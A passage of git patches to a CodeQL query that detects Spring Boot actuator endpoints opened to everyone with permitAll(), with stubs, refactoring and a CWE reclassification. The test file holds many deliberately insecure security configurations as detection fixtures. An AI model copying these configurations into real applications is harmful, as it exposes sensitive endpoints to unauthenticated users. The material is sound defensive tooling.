SecurityMatchersCall + } +} + /** Holds if `permitAllCall` is called on request(s) mapped to actuator endpoint(s). */ predicate permitsSpringBootActuators(PermitAllCall permitAllCall) { - exists(AuthorizeRequestsCall authorizeRequestsCall | + exists(AuthorizeCall authorizeCall | // .requestMatcher(EndpointRequest).authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof RequestMatcherCall + authorizeCall.getQualifier() instanceof MatcherCall or // .requestMatchers(matcher -> EndpointRequest).authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof RequestMatchersCall + authorizeCall.getQualifier() instanceof MatchersCall | // [...].authorizeRequests(r -> r.anyRequest().permitAll()) or // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) - authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = permitAllCall and + authorizeCall.getArgument(0).(LambdaExpr).getExprBody() = permitAllCall and ( permitAllCall.getQualifier() instanceof AnyRequestCall or permitAllCall.getQualifier() instanceof RegistryRequestMatchersCall @@ -59,30 +116,30 @@ predicate permitsSpringBootActuators(PermitAllCall permitAllCall) { or // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or // [...].authorizeRequests().anyRequest().permitAll() - authorizeRequestsCall.getNumArgument() = 0 and + authorizeCall.getNumArgument() = 0 and exists(RegistryRequestMatchersCall registryRequestMatchersCall | - registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and + registryRequestMatchersCall.getQualifier() = authorizeCall and permitAllCall.getQualifier() = registryRequestMatchersCall ) or exists(AnyRequestCall anyRequestCall | - anyRequestCall.getQualifier() = authorizeRequestsCall and + anyRequestCall.getQualifier() = authorizeCall and permitAllCall.getQualifier() = anyRequestCall ) ) or - exists(AuthorizeRequestsCall authorizeRequestsCall | + exists(AuthorizeCall authorizeCall | // http.authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof VarAccess + authorizeCall.getQualifier() instanceof VarAccess | // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) - authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = permitAllCall and + authorizeCall.getArgument(0).(LambdaExpr).getExprBody() = permitAllCall and permitAllCall.getQualifier() instanceof RegistryRequestMatchersCall or // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or - authorizeRequestsCall.getNumArgument() = 0 and + authorizeCall.getNumArgument() = 0 and exists(RegistryRequestMatchersCall registryRequestMatchersCall | - registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and + registryRequestMatchersCall.getQualifier() = authorizeCall and permitAllCall.getQualifier() = registryRequestMatchersCall ) ) diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java index 71856f5c1a92..fbe9d2e6e5cd 100644 --- a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java @@ -2,6 +2,7 @@ import org.springframework.security.config.annotation.web.builders.HttpSecurity; public class SpringBootActuatorsTest { + // Spring security version 5.2.3 used `authorizeRequests` and `requestMatcher(s)` protected void configure(HttpSecurity http) throws Exception { http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests(requests -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator } @@ -101,4 +102,166 @@ protected void configureOkNoPermitAll6(HttpSecurity http) throws Exception { protected void configureOkNoPermitAll7(HttpSecurity http) throws Exception { http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest(); } + + // Spring security version 5.5.0 introduced `authorizeHttpRequests` + protected void configure_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests(requests -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator + } + + protected void configure2_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure3_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure4_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest().permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure5_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure6_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll()); // $ hasExposedSpringBootActuator + } + + protected void configure7_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest().permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configureOk3_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests().anyRequest().permitAll(); + } + + protected void configureOk4_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests(authz -> authz.anyRequest().permitAll()); + } + + protected void configureOkSafeEndpoints1_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.to("health", "info")).authorizeHttpRequests(requests -> requests.anyRequest().permitAll()); + } + + protected void configureOkSafeEndpoints2_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.to("health")).authorizeHttpRequests().requestMatchers(EndpointRequest.to("health")).permitAll(); + } + + protected void configureOkSafeEndpoints3_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeHttpRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); + } + + protected void configureOkSafeEndpoints4_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.to("health", "info")).authorizeHttpRequests().anyRequest().permitAll(); + } + + protected void configureOkSafeEndpoints5_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); + } + + protected void configureOkSafeEndpoints6_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests(requests -> requests.requestMatchers(EndpointRequest.to("health", "info")).permitAll()); + } + + protected void configureOkSafeEndpoints7_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeHttpRequests().anyRequest().permitAll(); + } + + protected void configureOkNoPermitAll1_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests(requests -> requests.anyRequest()); + } + + protected void configureOkNoPermitAll2_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll3_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll4_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest(); + } + + protected void configureOkNoPermitAll5_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll6_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.authorizeHttpRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint())); + } + + protected void configureOkNoPermitAll7_authorizeHttpRequests(HttpSecurity http) throws Exception { + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest(); + } + + // Spring security version 5.8.0 introduced `securityMatcher(s)` + protected void configure_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests(requests -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator + } + + protected void configure2_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure3_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure4_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest().permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configure7_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest().permitAll(); // $ hasExposedSpringBootActuator + } + + protected void configureOk1_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOk2_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkSafeEndpoints1_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.to("health", "info")).authorizeHttpRequests(requests -> requests.anyRequest().permitAll()); + } + + protected void configureOkSafeEndpoints2_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.to("health")).authorizeHttpRequests().requestMatchers(EndpointRequest.to("health")).permitAll(); + } + + protected void configureOkSafeEndpoints3_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeHttpRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); + } + + protected void configureOkSafeEndpoints4_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.to("health", "info")).authorizeHttpRequests().anyRequest().permitAll(); + } + + protected void configureOkSafeEndpoints7_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeHttpRequests().anyRequest().permitAll(); + } + + protected void configureOkNoPermitAll1_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests(requests -> requests.anyRequest()); + } + + protected void configureOkNoPermitAll2_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll3_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); + } + + protected void configureOkNoPermitAll4_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest(); + } + + protected void configureOkNoPermitAll7_securityMatchers(HttpSecurity http) throws Exception { + http.securityMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest(); + } } diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/builders/HttpSecurity.java b/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/builders/HttpSecurity.java index 3dbe33cdeb9c..f900fc74d2fd 100644 --- a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/builders/HttpSecurity.java +++ b/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/builders/HttpSecurity.java @@ -9,6 +9,7 @@ import org.springframework.security.config.Customizer; import org.springframework.security.config.annotation.web.configurers.CsrfConfigurer; import org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer; +import org.springframework.security.config.annotation.web.configurers.AuthorizeHttpRequestsConfigurer; import org.springframework.security.config.annotation.web.AbstractRequestMatcherRegistry; public final class HttpSecurity extends AbstractConfiguredSecurityBuilder @@ -18,6 +19,14 @@ public HttpSecurity requestMatcher(RequestMatcher requestMatcher) { return this; } + public HttpSecurity securityMatcher(RequestMatcher requestMatcher) { + return this; + } + + public HttpSecurity securityMatcher(String... patterns) { + return this; + } + public HttpSecurity authorizeRequests( Customizer.ExpressionInterceptUrlRegistry> authorizeRequestsCustomizer) throws Exception { @@ -29,6 +38,17 @@ public ExpressionUrlAuthorizationConfigurer.ExpressionInterceptUrl return null; } + public HttpSecurity authorizeHttpRequests( + Customizer.AuthorizationManagerRequestMatcherRegistry> authorizeHttpRequestsCustomizer) + throws Exception { + return this; + } + + public AuthorizeHttpRequestsConfigurer.AuthorizationManagerRequestMatcherRegistry authorizeHttpRequests() + throws Exception { + return null; + } + public HttpSecurity requestMatchers(Customizer requestMatcherCustomizer) { return this; } @@ -37,6 +57,14 @@ public RequestMatcherConfigurer requestMatchers() { return null; } + public HttpSecurity securityMatchers(Customizer requestMatcherCustomizer) { + return this; + } + + public RequestMatcherConfigurer securityMatchers() { + return null; + } + public CsrfConfigurer csrf() { return null; } diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java b/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java new file mode 100644 index 000000000000..f27a2aeef5ae --- /dev/null +++ b/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java @@ -0,0 +1,18 @@ +package org.springframework.security.config.annotation.web.configurers; + +import org.springframework.security.config.annotation.web.AbstractRequestMatcherRegistry; +import org.springframework.security.config.annotation.web.HttpSecurityBuilder; + +public final class AuthorizeHttpRequestsConfigurer> + extends AbstractHttpConfigurer, H> { + + public final class AuthorizationManagerRequestMatcherRegistry extends + AbstractRequestMatcherRegistry { + } + + public class AuthorizedUrl { + public AuthorizationManagerRequestMatcherRegistry permitAll() { + return null; + } + } +} From 9e51b014d24a5ce2c5931cb7a46888a966e6eb8c Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Sun, 23 Feb 2025 23:28:10 -0500 Subject: [PATCH 018/892] Java: handle example in Spring docs --- .../code/java/security/SpringBootActuatorsQuery.qll | 9 +++++++++ .../security/CWE-016/SpringBootActuatorsTest.java | 7 +++++++ 2 files changed, 16 insertions(+) diff --git a/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll index f3635912d5a4..d58955a4037e 100644 --- a/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll +++ b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll @@ -142,5 +142,14 @@ predicate permitsSpringBootActuators(PermitAllCall permitAllCall) { registryRequestMatchersCall.getQualifier() = authorizeCall and permitAllCall.getQualifier() = registryRequestMatchersCall ) + or + exists(Variable v, MatcherCall matcherCall | + // http.securityMatcher(EndpointRequest.toAnyEndpoint()); + // http.authorizeRequests([...].permitAll()) + v.getAnAccess() = authorizeCall.getQualifier() and + v.getAnAccess() = matcherCall.getQualifier() and + authorizeCall.getArgument(0).(LambdaExpr).getExprBody() = permitAllCall and + permitAllCall.getQualifier() instanceof AnyRequestCall + ) ) } diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java index fbe9d2e6e5cd..516c53e4b206 100644 --- a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java @@ -264,4 +264,11 @@ protected void configureOkNoPermitAll4_securityMatchers(HttpSecurity http) throw protected void configureOkNoPermitAll7_securityMatchers(HttpSecurity http) throws Exception { http.securityMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeHttpRequests().anyRequest(); } + + // Spring doc example + // https://docs.spring.io/spring-boot/reference/actuator/endpoints.html#actuator.endpoints.security + public void securityFilterChain(HttpSecurity http) throws Exception { + http.securityMatcher(EndpointRequest.toAnyEndpoint()); + http.authorizeHttpRequests((requests) -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator + } } From f65a5b9a6625c43c9cc4ce8fd9e1982455627325 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Sun, 23 Feb 2025 23:37:05 -0500 Subject: [PATCH 019/892] Java: add test for qhelp good example --- .../security/CWE-016/SpringBootActuatorsTest.java | 7 +++++++ .../web/configurers/AuthorizeHttpRequestsConfigurer.java | 4 ++++ .../configurers/ExpressionUrlAuthorizationConfigurer.java | 4 ++++ 3 files changed, 15 insertions(+) diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java index 516c53e4b206..2f54cd442b50 100644 --- a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java @@ -271,4 +271,11 @@ public void securityFilterChain(HttpSecurity http) throws Exception { http.securityMatcher(EndpointRequest.toAnyEndpoint()); http.authorizeHttpRequests((requests) -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator } + + // QHelp Good example + protected void configureQhelpGood(HttpSecurity http) throws Exception { + // GOOD: only users with ENDPOINT_ADMIN role are allowed to access the actuator endpoints + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests((requests) -> + requests.anyRequest().hasRole("ENDPOINT_ADMIN")); + } } diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java b/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java index f27a2aeef5ae..ff54fc7e3d11 100644 --- a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java +++ b/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/AuthorizeHttpRequestsConfigurer.java @@ -14,5 +14,9 @@ public class AuthorizedUrl { public AuthorizationManagerRequestMatcherRegistry permitAll() { return null; } + + public AuthorizationManagerRequestMatcherRegistry hasRole(String role) { + return null; + } } } diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/ExpressionUrlAuthorizationConfigurer.java b/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/ExpressionUrlAuthorizationConfigurer.java index 012997dc5024..be4e14019779 100644 --- a/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/ExpressionUrlAuthorizationConfigurer.java +++ b/java/ql/test/stubs/springframework-5.3.8/org/springframework/security/config/annotation/web/configurers/ExpressionUrlAuthorizationConfigurer.java @@ -12,5 +12,9 @@ public class AuthorizedUrl { public ExpressionInterceptUrlRegistry permitAll() { return null; } + + public ExpressionInterceptUrlRegistry hasRole(String role) { + return null; + } } } From 6fe7c7a2334dff8db2df115aa02751cf399f3645 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Mon, 24 Feb 2025 11:44:13 -0500 Subject: [PATCH 020/892] Java: some refactoring --- .../java/frameworks/spring/SpringSecurity.qll | 54 ++++++++++-- .../security/SpringBootActuatorsQuery.qll | 87 +++++-------------- 2 files changed, 69 insertions(+), 72 deletions(-) diff --git a/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll b/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll index a8de07ca5bc7..901ed06270e4 100644 --- a/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll +++ b/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll @@ -40,9 +40,9 @@ class TypeAbstractRequestMatcherRegistry extends Class { } /** - * A call to `HttpSecurity.authorizeRequests` method. + * A call to the `HttpSecurity.authorizeRequests` method. * - * Note: this API is deprecated and scheduled for removal + * Note: this method is deprecated and scheduled for removal * in Spring Security 7.0. */ class AuthorizeRequestsCall extends MethodCall { @@ -53,9 +53,9 @@ class AuthorizeRequestsCall extends MethodCall { } /** - * A call to `HttpSecurity.authorizeHttpRequests` method. + * A call to the `HttpSecurity.authorizeHttpRequests` method. * - * Note: the no-argument version of this API is deprecated + * Note: the no-argument version of this method is deprecated * and scheduled for removal in Spring Security 7.0. */ class AuthorizeHttpRequestsCall extends MethodCall { @@ -65,7 +65,49 @@ class AuthorizeHttpRequestsCall extends MethodCall { } } -/** A call to `AuthorizedUrl.permitAll` method. */ +/** + * A call to the `HttpSecurity.requestMatcher` method. + * + * Note: this method was removed in Spring Security 6.0. + * It was replaced by `securityMatcher`. + */ +class RequestMatcherCall extends MethodCall { + RequestMatcherCall() { + this.getMethod().hasName("requestMatcher") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity + } +} + +/** + * A call to the `HttpSecurity.requestMatchers` method. + * + * Note: this method was removed in Spring Security 6.0. + * It was replaced by `securityMatchers`. + */ +class RequestMatchersCall extends MethodCall { + RequestMatchersCall() { + this.getMethod().hasName("requestMatchers") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity + } +} + +/** A call to the `HttpSecurity.securityMatcher` method. */ +class SecurityMatcherCall extends MethodCall { + SecurityMatcherCall() { + this.getMethod().hasName("securityMatcher") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity + } +} + +/** A call to the `HttpSecurity.securityMatchers` method. */ +class SecurityMatchersCall extends MethodCall { + SecurityMatchersCall() { + this.getMethod().hasName("securityMatchers") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity + } +} + +/** A call to the `AuthorizedUrl.permitAll` method. */ class PermitAllCall extends MethodCall { PermitAllCall() { this.getMethod().hasName("permitAll") and @@ -73,7 +115,7 @@ class PermitAllCall extends MethodCall { } } -/** A call to `AbstractRequestMatcherRegistry.anyRequest` method. */ +/** A call to the `AbstractRequestMatcherRegistry.anyRequest` method. */ class AnyRequestCall extends MethodCall { AnyRequestCall() { this.getMethod().hasName("anyRequest") and diff --git a/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll index d58955a4037e..76607ed794a9 100644 --- a/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll +++ b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll @@ -5,32 +5,36 @@ private import semmle.code.java.frameworks.spring.SpringSecurity private import semmle.code.java.frameworks.spring.SpringBoot /** - * A call to `HttpSecurity.requestMatcher` method with argument + * A call to an `HttpSecurity` matcher method with argument * `EndpointRequest.toAnyEndpoint()`. */ -private class RequestMatcherCall extends MethodCall { - RequestMatcherCall() { - this.getMethod().hasName("requestMatcher") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and +private class HttpSecurityMatcherCall extends MethodCall { + HttpSecurityMatcherCall() { + ( + this instanceof RequestMatcherCall or + this instanceof SecurityMatcherCall + ) and this.getArgument(0) instanceof ToAnyEndpointCall } } /** - * A call to `HttpSecurity.requestMatchers` method with lambda argument - * `EndpointRequest.toAnyEndpoint()`. + * A call to an `HttpSecurity` matchers method with lambda + * argument `EndpointRequest.toAnyEndpoint()`. */ -private class RequestMatchersCall extends MethodCall { - RequestMatchersCall() { - this.getMethod().hasName("requestMatchers") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and +private class HttpSecurityMatchersCall extends MethodCall { + HttpSecurityMatchersCall() { + ( + this instanceof RequestMatchersCall or + this instanceof SecurityMatchersCall + ) and this.getArgument(0).(LambdaExpr).getExprBody() instanceof ToAnyEndpointCall } } /** - * A call to `AbstractRequestMatcherRegistry.requestMatchers` method with an argument - * `RequestMatcher.toAnyEndpoint()`. + * A call to an `AbstractRequestMatcherRegistry.requestMatchers` method with + * argument `EndpointRequest.toAnyEndpoint()`. */ private class RegistryRequestMatchersCall extends MethodCall { RegistryRequestMatchersCall() { @@ -40,34 +44,7 @@ private class RegistryRequestMatchersCall extends MethodCall { } } -/** - * A call to `HttpSecurity.securityMatcher` method with argument - * `EndpointRequest.toAnyEndpoint()`. - */ -private class SecurityMatcherCall extends MethodCall { - SecurityMatcherCall() { - this.getMethod().hasName("securityMatcher") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and - this.getArgument(0) instanceof ToAnyEndpointCall - } -} - -/** - * A call to `HttpSecurity.securityMatchers` method with lambda argument - * `EndpointRequest.toAnyEndpoint()`. - */ -private class SecurityMatchersCall extends MethodCall { - SecurityMatchersCall() { - this.getMethod().hasName("securityMatchers") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and - this.getArgument(0).(LambdaExpr).getExprBody() instanceof ToAnyEndpointCall - } -} - -/** - * A call to a method that authorizes requests, e.g. `authorizeRequests` or - * `authorizeHttpRequests`. - */ +/** A call to an `HttpSecurity` method that authorizes requests. */ private class AuthorizeCall extends MethodCall { AuthorizeCall() { this instanceof AuthorizeRequestsCall or @@ -75,36 +52,14 @@ private class AuthorizeCall extends MethodCall { } } -/** - * A call to a matcher method with argument - * `EndpointRequest.toAnyEndpoint()`. - */ -private class MatcherCall extends MethodCall { - MatcherCall() { - this instanceof RequestMatcherCall or - this instanceof SecurityMatcherCall - } -} - -/** - * A call to a matchers method with argument - * `EndpointRequest.toAnyEndpoint()`. - */ -private class MatchersCall extends MethodCall { - MatchersCall() { - this instanceof RequestMatchersCall or - this instanceof SecurityMatchersCall - } -} - /** Holds if `permitAllCall` is called on request(s) mapped to actuator endpoint(s). */ predicate permitsSpringBootActuators(PermitAllCall permitAllCall) { exists(AuthorizeCall authorizeCall | // .requestMatcher(EndpointRequest).authorizeRequests([...]).[...] - authorizeCall.getQualifier() instanceof MatcherCall + authorizeCall.getQualifier() instanceof HttpSecurityMatcherCall or // .requestMatchers(matcher -> EndpointRequest).authorizeRequests([...]).[...] - authorizeCall.getQualifier() instanceof MatchersCall + authorizeCall.getQualifier() instanceof HttpSecurityMatchersCall | // [...].authorizeRequests(r -> r.anyRequest().permitAll()) or // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) @@ -143,7 +98,7 @@ predicate permitsSpringBootActuators(PermitAllCall permitAllCall) { permitAllCall.getQualifier() = registryRequestMatchersCall ) or - exists(Variable v, MatcherCall matcherCall | + exists(Variable v, HttpSecurityMatcherCall matcherCall | // http.securityMatcher(EndpointRequest.toAnyEndpoint()); // http.authorizeRequests([...].permitAll()) v.getAnAccess() = authorizeCall.getQualifier() and From 53cb30dcd00a7f7a1d32f2694781ecc598b8a9af Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Mon, 24 Feb 2025 15:48:28 -0500 Subject: [PATCH 021/892] Java: update metadata, move from CWE-016 to CWE-200 --- .../CWE/{CWE-016 => CWE-200}/SpringBootActuators.java | 0 .../CWE/{CWE-016 => CWE-200}/SpringBootActuators.qhelp | 0 .../Security/CWE/{CWE-016 => CWE-200}/SpringBootActuators.ql | 4 ++-- .../SpringBootActuators}/SpringBootActuatorsTest.expected | 0 .../tests/SpringBootActuators}/SpringBootActuatorsTest.java | 0 .../tests/SpringBootActuators}/SpringBootActuatorsTest.ql | 0 .../semmle/tests/SpringBootActuators}/options | 2 +- 7 files changed, 3 insertions(+), 3 deletions(-) rename java/ql/src/Security/CWE/{CWE-016 => CWE-200}/SpringBootActuators.java (100%) rename java/ql/src/Security/CWE/{CWE-016 => CWE-200}/SpringBootActuators.qhelp (100%) rename java/ql/src/Security/CWE/{CWE-016 => CWE-200}/SpringBootActuators.ql (91%) rename java/ql/test/query-tests/security/{CWE-016 => CWE-200/semmle/tests/SpringBootActuators}/SpringBootActuatorsTest.expected (100%) rename java/ql/test/query-tests/security/{CWE-016 => CWE-200/semmle/tests/SpringBootActuators}/SpringBootActuatorsTest.java (100%) rename java/ql/test/query-tests/security/{CWE-016 => CWE-200/semmle/tests/SpringBootActuators}/SpringBootActuatorsTest.ql (100%) rename java/ql/test/query-tests/security/{CWE-016 => CWE-200/semmle/tests/SpringBootActuators}/options (62%) diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.java b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.java similarity index 100% rename from java/ql/src/Security/CWE/CWE-016/SpringBootActuators.java rename to java/ql/src/Security/CWE/CWE-200/SpringBootActuators.java diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qhelp b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.qhelp similarity index 100% rename from java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qhelp rename to java/ql/src/Security/CWE/CWE-200/SpringBootActuators.qhelp diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql b/java/ql/src/Security/CWE/CWE-200/SpringBootActuators.ql similarity index 91% rename from java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql rename to java/ql/src/Security/CWE/CWE-200/SpringBootActuators.ql index bac0a72e1441..97d9b506f785 100644 --- 